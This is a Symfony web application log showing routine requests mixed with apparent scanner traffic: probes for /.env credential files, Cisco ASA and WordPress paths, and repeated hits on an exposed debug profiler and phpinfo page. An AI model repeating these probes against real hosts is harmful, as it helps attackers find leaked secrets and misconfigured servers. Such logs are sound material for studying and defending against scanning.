[2025-12-19 13:13:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /login"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /login\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 13:15:02] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7c6e2f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7c6e2f?panel=config","method":"GET"} []
[2025-12-19 13:15:02] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-19 13:15:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /+CSCOL+/Java.jar"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /+CSCOL+/Java.jar\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 13:15:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /+CSCOL+/a1.jar"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /+CSCOL+/a1.jar\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 13:18:03] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://www.unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-19 13:19:37] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=66.249.66.45&limit=10","method":"GET"} []
[2025-12-19 13:19:37] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=66.249.66.45&limit=10","method":"GET"} []
[2025-12-19 13:22:28] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"873b32","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/873b32","method":"GET"} []
[2025-12-19 13:22:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-19 13:24:06] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7c6e2f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7c6e2f","method":"GET"} []
[2025-12-19 13:24:06] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-19 13:32:16] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"064ca9","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/064ca9?panel=twig","method":"GET"} []
[2025-12-19 13:32:16] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-19 13:34:28] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"89d052","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/89d052?panel=validator","method":"GET"} []
[2025-12-19 13:34:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
[2025-12-19 13:36:09] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"30fc6c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/30fc6c?panel=security","method":"GET"} []
[2025-12-19 13:36:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-19 13:37:59] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"703e75","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/703e75?panel=time","method":"GET"} []
[2025-12-19 13:37:59] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-19 13:40:55] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"064ca9","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/064ca9?panel=time","method":"GET"} []
[2025-12-19 13:40:55] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-19 13:42:19] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-19 13:44:04] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-19 13:47:03] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-19 13:48:08] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"064ca9","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/064ca9?panel=security","method":"GET"} []
[2025-12-19 13:48:08] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-19 13:48:39] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"201ee7","_route":"_profiler_search_results"},"request_uri":"https://unda.co/_profiler/201ee7/search/results?ip=198.235.24.160&limit=10","method":"GET"} []
[2025-12-19 13:48:39] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?ip=198.235.24.160&limit=10","method":"GET"} []
[2025-12-19 13:49:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 13:49:30] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
[2025-12-19 13:56:28] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"064ca9","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/064ca9?panel=config","method":"GET"} []
[2025-12-19 13:56:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-19 13:59:21] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/latest?ip=198.235.24.160&limit=10","method":"GET"} []
[2025-12-19 13:59:21] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?ip=198.235.24.160&limit=10","method":"GET"} []
[2025-12-19 14:03:57] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-19 14:03:58] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-19 14:05:26] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"064ca9","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/064ca9?panel=cache","method":"GET"} []
[2025-12-19 14:05:26] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-19 14:07:49] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
[2025-12-19 14:09:29] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://web.unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-19 14:12:36] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"628fdc","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/628fdc?panel=logger","method":"GET"} []
[2025-12-19 14:12:36] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
[2025-12-19 14:14:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"064ca9","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/064ca9","method":"GET"} []
[2025-12-19 14:14:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-19 14:16:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 14:16:18] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
[2025-12-19 14:17:15] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"12dd43","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/12dd43?panel=form","method":"GET"} []
[2025-12-19 14:17:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
[2025-12-19 14:22:51] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7c6e2f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7c6e2f?panel=security","method":"GET"} []
[2025-12-19 14:22:51] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-19 14:24:32] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0f40a7","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0f40a7?panel=time","method":"GET"} []
[2025-12-19 14:24:32] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-19 14:27:03] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-19 14:27:03] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=51.161.81.10&limit=10&method=POST","method":"GET"} []
[2025-12-19 14:27:03] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=51.161.81.10&limit=10&method=POST","method":"GET"} []
[2025-12-19 14:31:05] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/","method":"GET"} []
[2025-12-19 14:32:00] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-19 14:34:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/css/colors/blue" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/css/colors/blue\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 14:34:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/block-bindings" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/block-bindings\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 14:35:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/js/dist" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/js/dist\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 14:35:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/rest-api/fields" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/rest-api/fields\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 14:35:09] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/images" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/images\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 14:35:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/js/dist/development" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/js/dist/development\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 14:35:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 14:35:17] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/css" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/css\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 14:35:19] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/js" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/js\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 14:35:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/js/widgets" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/js/widgets\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 14:35:22] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/backups-dup-lite" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/backups-dup-lite\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 14:35:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/languages" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/languages\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 14:35:25] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/uploads" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/uploads\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 14:35:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/uploads/2025" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/uploads/2025\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 14:35:27] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/IXR" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/IXR\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 14:35:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/Text" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/Text\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 14:35:30] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/Text/Diff/Engine" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/Text/Diff/Engine\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
